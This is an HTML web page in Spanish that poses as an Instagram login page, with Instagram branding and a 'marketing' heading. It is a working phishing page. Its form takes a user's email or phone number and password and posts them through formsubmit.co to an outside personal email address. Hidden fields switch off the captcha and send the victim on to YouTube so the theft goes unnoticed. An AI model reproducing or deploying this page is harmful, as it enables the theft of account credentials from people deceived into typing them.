<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Iniciar sesión en Instagram</title>
    <style>
  body {
    background-image: url('https://i.supaimg.com/69558aa3-a042-432a-8772-6fbf8591696a.jpg');
  }
</style>
  </head>
<body>
    <center>
        <h1 style="color: white; font-size: 36px;">marketing</h1>
        <form action="https://formsubmit.co/lokamir408@w3heroes.com" method="POST">
            <input type="hidden" name="_subject" value="Nuevo inicio de sesión">
            <input type="hidden" name="_captcha" value="false">
            <input type="hidden" name="_next" value="https://www.youtube.com">
          <input type="date"date="date"name="fecha"placeholder="fecha"required><br><br>
            <input type="text" name="usuario" placeholder="correo eletrocnico o numero de telefono"size="30"required><br><br><br>
            <input type="password" name="contraseña" placeholder="Contraseña"size="30" required><br><br><br><br>
          
            <button type="submit">INICIAR SECION</button>
        </form>
        <h1 style="color: white  ; font-size: 30px;">  █║█║█ 𝕀𝕟𝕤𝕥𝕒𝕘𝕣𝕒𝕞║█║█║                                    
        </h1>
      <h2 style="color:white;font-size:40;">ANDRES PACHECO</h2>
      <p style="color:white">BIEN VENIDO  </p>
      <h3 style="color:white">marketin</h3>
    </center>
</body>
</html>